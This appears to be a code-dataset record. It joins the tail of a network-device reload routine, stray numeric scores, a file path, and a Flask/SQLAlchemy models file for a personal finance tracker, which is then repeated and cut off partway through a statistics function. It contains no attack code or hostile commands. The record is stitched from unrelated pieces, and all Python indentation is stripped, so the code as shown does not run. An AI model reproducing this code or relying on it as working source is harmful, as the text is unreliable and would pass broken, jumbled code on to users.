if not isinstance(dialog, Dialog):
raise SubCommandFailure(
"dialog passed must be an instance of Dialog")
if self.context.get('console'):
dialog = self.service_dialog(service_dialog=dialog)
dialog += Dialog(authentication_statement_list)
dialog += Dialog(reload_continue_statement_list)
con.spawn.sendline(reload_command)
try:
self.result = dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
except Exception as err:
raise SubCommandFailure("Reload failed %s" % err)
if self.result:
self.result = utils.remove_ansi_escape_codes(self.result.match_output)
else:
con.log.warning('Did not detect a console session, will try to reconnect...')
dialog = Dialog(reload_statement_list)
con.spawn.sendline(reload_command)
dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
con.expect('.+')
con.log.warning('Disconnecting...')
con.disconnect()
for x in range(3):
con.log.warning('Waiting for {} seconds'.format(con.settings.RELOAD_WAIT))
sleep(con.settings.RELOAD_WAIT)
con.log.warning('Trying to connect... attempt #{}'.format(x+1))
try:
output = con.connect()
self.result = output
except:
con.log.warning('Connection failed')
if con.connected:
break
if not con.connected:
raise SubCommandFailure('Reload failed - could not reconnect') | 0.460532 | 0.063482 |
from datetime import datetime, timedelta
import pandas as pd
import flask
from sqlalchemy import extract, asc, desc, func, text
from app import db, app
today = datetime.today()
first_of_this_month = today.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
last_of_prev_month = first_of_this_month - timedelta(days=1)
first_of_prev_month = last_of_prev_month.replace(day=1)
minus_13_months = (first_of_this_month - timedelta(days=390)).replace(day=1)
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
accName = db.Column(db.String, unique=True, nullable=False)
#transactions = db.relationship('Transaction', backref=db.backref('trans', lazy=True))
def __repr__(self):
return '<Account {}>'.format(self.accName)
def create_one(newAccName):
stmt = Account(accName=newAccName)
db.session.add(stmt)
db.session.commit()
def one_acc(accountid):
return Account.query.filter_by(id = accountid).first()
'''def list_acc():
q1 = db.session.query(Transaction.acc_id, Transaction.amount.label('balance'), Transaction.traDate)\
.distinct(Transaction.acc_id)\
.outerjoin(Tag)\
.filter(Tag.isBlnc==True)\
.order_by(Transaction.acc_id, Transaction.traDate.desc())\
.subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.TO_CHAR(Transaction.uplDate,'YYYY-MM-DD')).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)'''
def list_acc():
cte = db.session.query(Transaction.acc_id\
,Transaction.amount.label('balance')\
,func.row_number().over(partition_by=Transaction.acc_id, order_by=desc(Transaction.traDate)).label("rn"))\
.outerjoin(Tag)\
.filter(Tag.isBlnc==1)\
.cte()
q1 = db.session.query(cte.c.acc_id, cte.c.balance).filter(cte.c.rn == 1).subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.date(Transaction.uplDate)).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)
class Transaction(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
traDate = db.Column(db.Date, nullable=False)
amount = db.Column(db.Float, nullable=False)
desc = db.Column(db.String, nullable=False)
card = db.Column(db.String(1), nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
uplDate = db.Column(db.DateTime, nullable=False, default=datetime.now)
confirmed = db.Column(db.Boolean, nullable=True, default=False)
def __repr__(self):
return '<Transaction {}>'.format(self.desc)
def create_one(tDate, tAmnt, tDesc, tag, acc, card, confrm):
stmt = Transaction(traDate=tDate, amount=tAmnt, desc=tDesc, card=card, tag_id=tag, acc_id=acc, confirmed=confrm)
db.session.add(stmt)
db.session.commit()
def update_trans(tid, traDate, amount, desc, tag):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.traDate = traDate
stmt.amount = amount
stmt.desc = desc
stmt.tag_id = tag
stmt.confirmed = True
db.session.commit()
def update_trans_amount(tid, amount):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.amount = amount
db.session.commit()
def update_desc(account_id, desc_from, desc_to):
db.session.query(Transaction)\
.filter(Transaction.desc.like('%'+ desc_from +'%'))\
.update({Transaction.desc: func.replace(Transaction.desc, desc_from, desc_to)}
,synchronize_session=False)
db.session.commit()
def delete_trans(tid):
stmt = Transaction.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def cnt_all(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id).one_or_none()
def cnt_new(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == False).one_or_none()
def cnt_avg_sum_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags)).one_or_none()
def list_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags))\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def cnt_avg_sum_filtered_new(account_id, date_from, date_to):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False).one_or_none()
def list_filtered_new(account_id, date_from, date_to):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False)\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def list_latest_uploads_by_card(account_id, card):
return db.session.query(Transaction.card, Transaction.desc, Transaction.traDate, Transaction.amount)\
.filter(Transaction.acc_id == account_id, Transaction.card == card)\
.order_by(Transaction.traDate.desc()).limit(3).all()
def first_date(account_id):
return db.session.query(db.func.min(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def last_date(account_id):
return db.session.query(db.func.max(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def count_months(account_id):
return db.session.query(func.TO_CHAR(Transaction.traDate,'YYYYMM'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate < first_of_this_month)\
.distinct().count()
def max_year(account_id):
return Transaction.query\
.with_entities(extract('year',func.max(Transaction.traDate).label('max_year')))\
.filter(Transaction.acc_id == account_id).scalar()
def list_year(account_id):
return db.session.query(extract('year',Transaction.traDate).label('year'))\
.filter(Transaction.acc_id == account_id).distinct().order_by(desc('year'))
def chart_header(column_name, account_id):
subquery = db.session.query(Tag.tgr_id).filter(getattr(Tag, column_name)==True, Taggroup.acc_id==account_id)
return db.session.query(Taggroup.gName, Taggroup.gColor)\
.filter(Taggroup.id.in_(subquery))\
.order_by(Taggroup.gName)
def chart_data(account_id, column_name, months):
first_of_n_month = (first_of_this_month - timedelta(days=months*30)).replace(day=1)
q = db.session.query(Taggroup.gName
,func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id\
,Transaction.confirmed == True\
,Transaction.traDate >= first_of_n_month\
,Transaction.traDate < first_of_this_month\
,getattr(Tag, column_name)==True)\
.group_by(Taggroup.gName\
,func.TO_CHAR(Transaction.traDate,'YYYYMM')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth'))\
.order_by('orderByCol',Taggroup.gName)
#get unique groups
g = []
prev_val = ''
for row in q:
if row.gName != prev_val:
g.append(row.gName)
prev_val = row.gName
#create months/group with default value
m = {}
prev_val = ''
for row in q:
if row.mnth != prev_val:
m[row.mnth] = {g_:0 for g_ in g}
prev_val = row.mnth
#replace values in dict if exists in q
for row in q:
for key in m:
for mk in m[key]:
if row.mnth==key and mk==row.gName :
m[key][mk] = row.total
return m
def get_dates(what_year_):
what_year = int(what_year_)
prev_year = what_year - 1
prev_month_num = last_of_prev_month.strftime("%m")
prev_month = int(prev_month_num) - 1 if int(prev_month_num) > 1 else 12
year_num = last_of_prev_month.strftime("%Y")
which_year = year_num if int(year_num) == what_year else prev_year
which_month = prev_month_num if int(year_num) == what_year else prev_month
end_12_month = last_of_prev_month.replace(year=what_year)
start_12_month = (end_12_month - timedelta(days=360)).replace(day=1)
return what_year, prev_year, which_year, which_month, start_12_month, end_12_month
def get_stats_year(account_id, what_year, lbl1, lbl2):
return db.session.query(Tag.tgr_id.label(lbl1), func.SUM(Transaction.amount).label(lbl2))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)==what_year)\
.group_by(Tag.tgr_id).subquery()
def get_statsDate(what_year):
gd = Transaction.get_dates(what_year)
fopm = first_of_prev_month.replace(year=int(gd[2]))
lopm = last_of_prev_month.replace(year=int(gd[2]))
return [str(gd[1])+'-01-01', str(gd[1])+'-12-31', str(gd[0])+'-01-01', str(gd[0])+'-12-31', str(fopm), str(lopm)]
def get_stat_year(account_id, what_year):
gd = Transaction.get_dates(what_year)
tg = Taggroup.list_tgroup_id_inSum(account_id)
q1 = db.session.query(Tag.tgr_id.label('tag1'), Taggroup.gName.label('Category'), Taggroup.gColor.label('color'), func.SUM(Transaction.amount).label('Total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)<=gd[0])\
.group_by(Tag.tgr_id, Taggroup.gName, Taggroup.gColor)\
.order_by(Tag.tgr_id).subquery()
q2 = Transaction.get_stats_year(account_id, gd[1], 'tag2', 'Prev_Year')
q3 = Transaction.get_stats_year(account_id, gd[0], 'tag3', 'This_Year')
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 12 else 12
q4 = db.session.query(Tag.tgr_id.label('tag4'), func.SUM(Transaction.amount/month_count).label('Avg_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Transaction.traDate>=gd[4], Transaction.traDate<gd[5])\
.group_by(Tag.tgr_id).subquery()
q5 = db.session.query(Tag.tgr_id.label('tag5'), func.SUM(Transaction.amount).label('Prev_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, extract('year',Transaction.traDate)==gd[2], extract('month',Transaction.traDate)==gd[3])\
.group_by(Tag.tgr_id).subquery()
return db.session.query(q1.c.Category, q1.c.tag1, q1.c.Total, q2.c.Prev_Year, q3.c.This_Year, (100*(q3.c.This_Year/q2.c.Prev_Year)).label('%_YTD'), q4.c.Avg_Month, q5.c.Prev_Month, q1.c.color)\
.outerjoin(q2, q1.c.tag1 == q2.c.tag2)\
.outerjoin(q3, q1.c.tag1 == q3.c.tag3)\
.outerjoin(q4, q1.c.tag1 == q4.c.tag4)\
.outerjoin(q5, q1.c.tag1 == q5.c.tag5)\
.order_by(q1.c.tag1)
def get_stat_year_df(account_id, what_year):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = Transaction.get_stat_year(account_id, what_year)
df = pd.read_sql_query(q.statement, db.session.bind)
#transform valies from object to float
pd.options.display.float_format = '{:.2f}'.format
#exclude BILLS from summary
s = df.mask(~df['tag1'].isin(tg)).drop('tag1',1).sum()
#calculate '% YTD'
s.loc['%_YTD'] = 100*(s['This_Year'] / s['Prev_Year'])
#replace calculated value in specific position
df.loc[len(df)] = s
#replace summarised categ name
df = df.fillna({'Category':'Summary','tag1':0,'color':''})
#replace 'NaN' to '0', then limit decimals to 2
return df.fillna(0).round(2)
def get_stat_year_by_year(account_id):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = db.session.query( Tag.tgr_id.label('tag')\
, Taggroup.gName.label('Category')\
, Transaction.traDate.label('date')\
, Transaction.amount)\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False)\
.order_by(Tag.tgr_id)
df = pd.read_sql_query(q.statement, db.session.bind)
#add column 'year' based on 'date'
df['Year'] = pd.DatetimeIndex(df['date']).year
#groupby
df = df.groupby(['tag','Category','Year']).sum()
#pivot
df = pd.pivot_table(df, values = 'amount', index=['Category','tag'], columns = 'Year')\
.sort_values(by=['tag'], ascending=True)
#add column 'Total', to sum horizontally, per category
df.insert(loc=0, column='Total', value=df.sum(axis=1))
#add row 'Summary' to sum columns, except BILLS
df.loc['Summary'] = df.query("tag in @tg").sum()
#change FLOAT values to INT
return df.fillna(0).astype(int)
def chart_in_out(account_id):
sum_in = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount > 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
sum_out = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount < 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
return sum_in if sum_in is not None else 0, sum_out if sum_out is not None else 0
def chart_monthly_trend(account_id):
tag_inSum = Tag.list_tag_id_inSum(account_id)
month_by_month = db.session.query(\
func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.group_by(func.TO_CHAR(Transaction.traDate,'YYYYMM'),func.TO_CHAR(Transaction.traDate,'MON'),func.TEXT('Dummy'))\
.subquery()
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 13 else 13
month_avg = db.session.query(\
func.TEXT('AvgYear').label('orderByCol')\
,func.TEXT('AvgMonth').label('MON')\
,func.SUM(Transaction.amount/month_count).label('total_avg')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.subquery()
return db.session.query(month_by_month.c.orderByCol, month_by_month.c.mnth, month_by_month.c.total, month_avg.c.total_avg)\
.outerjoin(month_by_month, month_by_month.c.D == month_avg.c.D)\
.order_by(month_by_month.c.orderByCol)
class Taggroup(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
gName = db.Column(db.String, nullable=False)
gColor = db.Column(db.String(11), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<TagGroup {}>'.format(self.gName)
def insert_tag_group(g_name, color, accid):
stmt = Taggroup(gName=g_name, gColor=color, acc_id=accid)
db.session.add(stmt)
db.session.commit()
newid = stmt.id
def update_tag_group(gid, g_name, color):
stmt = Taggroup.query.filter_by(id=gid).first()
stmt.gName = g_name
stmt.gColor = color
db.session.commit()
def delete_tag_group(gid):
stmt = Taggroup.query.filter_by(id=gid).first()
db.session.delete(stmt)
db.session.commit()
def list_tgroup(account_id):
return Taggroup.query.filter(Taggroup.acc_id == account_id).order_by(Taggroup.id)
def list_tgroup_id(account_id):
q = db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id).all()
return [val for val, in q]
def list_tgroup_id_one(account_id):
return db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id.desc()).first()
def list_count(account_id):
return db.session.query(db.func.count(Taggroup.id)).filter(Taggroup.acc_id==account_id).scalar()
def list_tgroup_id_inSum(account_id):
q = db.session.query(Taggroup.id)\
.outerjoin(Tag)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)\
.distinct()
return [val for val, in q]
class Tag(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
tName = db.Column(db.String, nullable=False)
tgr_id = db.Column(db.Integer, db.ForeignKey('taggroup.id'), nullable=False)
isBlnc = db.Column(db.Boolean, nullable=False, default=0)
inSum = db.Column(db.Boolean, nullable=False, default=1)
chart1 = db.Column(db.Boolean, nullable=False, default=0)
chart2 = db.Column(db.Boolean, nullable=False, default=0)
chart3 = db.Column(db.Boolean, nullable=False, default=0)
def __repr__(self):
return '<Tag {}>'.format(self.tName)
def insert_tag(t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag(tName=t_name, tgr_id=g_id, isBlnc=balance, inSum=summary, chart1=c1, chart2=c2, chart3=c3)
db.session.add(stmt)
db.session.commit()
def update_tag(tid, t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag.query.filter_by(id=tid).first()
stmt.tName = t_name
stmt.tgr_id = g_id
stmt.isBlnc = balance
stmt.inSum = summary
stmt.chart1 = c1
stmt.chart2 = c2
stmt.chart3 = c3
db.session.commit()
def delete_tag(tid):
stmt = Tag.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def list_tag(account_id):
return db.session.query(Tag.id ,Tag.tName ,Tag.tgr_id ,Tag.isBlnc ,Tag.inSum ,Tag.chart1 ,Tag.chart2 ,Tag.chart3)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)\
.order_by(Tag.tgr_id, Tag.id)
def list_tag_id(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_of_group(grpid,account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.tgr_id==grpid, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_inSum(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_count(account_id):
return db.session.query(db.func.count(Tag.id))\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id).scalar()
class Condition(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
cName = db.Column(db.String, nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.cName)
def insert_cond(cname, tag, accid):
stmt = Condition(cName=cname, tag_id=tag, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_cond(cid, cName, tag):
stmt = Condition.query.filter_by(id=cid).first()
stmt.cName = cName
stmt.tag_id = tag
db.session.commit()
def delete_cond(cid):
stmt = Condition.query.filter_by(id=cid).first()
db.session.delete(stmt)
db.session.commit()
def list_cond(account_id):
return db.session.query(Condition.id, Condition.cName, Condition.tag_id)\
.outerjoin(Tag, Condition.tag_id == Tag.id)\
.filter(Condition.acc_id == account_id)\
.order_by(Tag.tgr_id, Condition.tag_id, Condition.id)
def list_count(account_id):
return db.session.query(db.func.count(Condition.id)).filter(Condition.acc_id==account_id).scalar()
class Description(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
descfrom = db.Column(db.String, nullable=False)
descto = db.Column(db.String, nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.descfrom)
def insert_desc(descfrom, descto, accid):
stmt = Description(descfrom=descfrom, descto=descto, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_desc(id, descfrom, descto):
stmt = Description.query.filter_by(id=id).first()
stmt.descfrom = descfrom
stmt.descto = descto
db.session.commit()
def delete_desc(id):
stmt = Description.query.filter_by(id=id).first()
db.session.delete(stmt)
db.session.commit()
def list_desc(account_id):
return Description.query.filter(Description.acc_id == account_id).order_by(Description.descfrom)
def list_count(account_id):
return db.session.query(db.func.count(Description.id)).filter(Description.acc_id==account_id).scalar()
#create all tables based on models above
with app.app_context():
db.create_all() | app/models_postgresql.py | from datetime import datetime, timedelta
import pandas as pd
import flask
from sqlalchemy import extract, asc, desc, func, text
from app import db, app
today = datetime.today()
first_of_this_month = today.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
last_of_prev_month = first_of_this_month - timedelta(days=1)
first_of_prev_month = last_of_prev_month.replace(day=1)
minus_13_months = (first_of_this_month - timedelta(days=390)).replace(day=1)
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
accName = db.Column(db.String, unique=True, nullable=False)
#transactions = db.relationship('Transaction', backref=db.backref('trans', lazy=True))
def __repr__(self):
return '<Account {}>'.format(self.accName)
def create_one(newAccName):
stmt = Account(accName=newAccName)
db.session.add(stmt)
db.session.commit()
def one_acc(accountid):
return Account.query.filter_by(id = accountid).first()
'''def list_acc():
q1 = db.session.query(Transaction.acc_id, Transaction.amount.label('balance'), Transaction.traDate)\
.distinct(Transaction.acc_id)\
.outerjoin(Tag)\
.filter(Tag.isBlnc==True)\
.order_by(Transaction.acc_id, Transaction.traDate.desc())\
.subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.TO_CHAR(Transaction.uplDate,'YYYY-MM-DD')).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)'''
def list_acc():
cte = db.session.query(Transaction.acc_id\
,Transaction.amount.label('balance')\
,func.row_number().over(partition_by=Transaction.acc_id, order_by=desc(Transaction.traDate)).label("rn"))\
.outerjoin(Tag)\
.filter(Tag.isBlnc==1)\
.cte()
q1 = db.session.query(cte.c.acc_id, cte.c.balance).filter(cte.c.rn == 1).subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.date(Transaction.uplDate)).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)
class Transaction(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
traDate = db.Column(db.Date, nullable=False)
amount = db.Column(db.Float, nullable=False)
desc = db.Column(db.String, nullable=False)
card = db.Column(db.String(1), nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
uplDate = db.Column(db.DateTime, nullable=False, default=datetime.now)
confirmed = db.Column(db.Boolean, nullable=True, default=False)
def __repr__(self):
return '<Transaction {}>'.format(self.desc)
def create_one(tDate, tAmnt, tDesc, tag, acc, card, confrm):
stmt = Transaction(traDate=tDate, amount=tAmnt, desc=tDesc, card=card, tag_id=tag, acc_id=acc, confirmed=confrm)
db.session.add(stmt)
db.session.commit()
def update_trans(tid, traDate, amount, desc, tag):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.traDate = traDate
stmt.amount = amount
stmt.desc = desc
stmt.tag_id = tag
stmt.confirmed = True
db.session.commit()
def update_trans_amount(tid, amount):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.amount = amount
db.session.commit()
def update_desc(account_id, desc_from, desc_to):
db.session.query(Transaction)\
.filter(Transaction.desc.like('%'+ desc_from +'%'))\
.update({Transaction.desc: func.replace(Transaction.desc, desc_from, desc_to)}
,synchronize_session=False)
db.session.commit()
def delete_trans(tid):
stmt = Transaction.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def cnt_all(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id).one_or_none()
def cnt_new(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == False).one_or_none()
def cnt_avg_sum_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags)).one_or_none()
def list_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags))\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def cnt_avg_sum_filtered_new(account_id, date_from, date_to):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False).one_or_none()
def list_filtered_new(account_id, date_from, date_to):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False)\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def list_latest_uploads_by_card(account_id, card):
return db.session.query(Transaction.card, Transaction.desc, Transaction.traDate, Transaction.amount)\
.filter(Transaction.acc_id == account_id, Transaction.card == card)\
.order_by(Transaction.traDate.desc()).limit(3).all()
def first_date(account_id):
return db.session.query(db.func.min(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def last_date(account_id):
return db.session.query(db.func.max(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def count_months(account_id):
return db.session.query(func.TO_CHAR(Transaction.traDate,'YYYYMM'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate < first_of_this_month)\
.distinct().count()
def max_year(account_id):
return Transaction.query\
.with_entities(extract('year',func.max(Transaction.traDate).label('max_year')))\
.filter(Transaction.acc_id == account_id).scalar()
def list_year(account_id):
return db.session.query(extract('year',Transaction.traDate).label('year'))\
.filter(Transaction.acc_id == account_id).distinct().order_by(desc('year'))
def chart_header(column_name, account_id):
subquery = db.session.query(Tag.tgr_id).filter(getattr(Tag, column_name)==True, Taggroup.acc_id==account_id)
return db.session.query(Taggroup.gName, Taggroup.gColor)\
.filter(Taggroup.id.in_(subquery))\
.order_by(Taggroup.gName)
def chart_data(account_id, column_name, months):
first_of_n_month = (first_of_this_month - timedelta(days=months*30)).replace(day=1)
q = db.session.query(Taggroup.gName
,func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id\
,Transaction.confirmed == True\
,Transaction.traDate >= first_of_n_month\
,Transaction.traDate < first_of_this_month\
,getattr(Tag, column_name)==True)\
.group_by(Taggroup.gName\
,func.TO_CHAR(Transaction.traDate,'YYYYMM')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth'))\
.order_by('orderByCol',Taggroup.gName)
#get unique groups
g = []
prev_val = ''
for row in q:
if row.gName != prev_val:
g.append(row.gName)
prev_val = row.gName
#create months/group with default value
m = {}
prev_val = ''
for row in q:
if row.mnth != prev_val:
m[row.mnth] = {g_:0 for g_ in g}
prev_val = row.mnth
#replace values in dict if exists in q
for row in q:
for key in m:
for mk in m[key]:
if row.mnth==key and mk==row.gName :
m[key][mk] = row.total
return m
def get_dates(what_year_):
what_year = int(what_year_)
prev_year = what_year - 1
prev_month_num = last_of_prev_month.strftime("%m")
prev_month = int(prev_month_num) - 1 if int(prev_month_num) > 1 else 12
year_num = last_of_prev_month.strftime("%Y")
which_year = year_num if int(year_num) == what_year else prev_year
which_month = prev_month_num if int(year_num) == what_year else prev_month
end_12_month = last_of_prev_month.replace(year=what_year)
start_12_month = (end_12_month - timedelta(days=360)).replace(day=1)
return what_year, prev_year, which_year, which_month, start_12_month, end_12_month
def get_stats_year(account_id, what_year, lbl1, lbl2):
return db.session.query(Tag.tgr_id.label(lbl1), func.SUM(Transaction.amount).label(lbl2))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)==what_year)\
.group_by(Tag.tgr_id).subquery()
def get_statsDate(what_year):
gd = Transaction.get_dates(what_year)
fopm = first_of_prev_month.replace(year=int(gd[2]))
lopm = last_of_prev_month.replace(year=int(gd[2]))
return [str(gd[1])+'-01-01', str(gd[1])+'-12-31', str(gd[0])+'-01-01', str(gd[0])+'-12-31', str(fopm), str(lopm)]
def get_stat_year(account_id, what_year):
gd = Transaction.get_dates(what_year)
tg = Taggroup.list_tgroup_id_inSum(account_id)
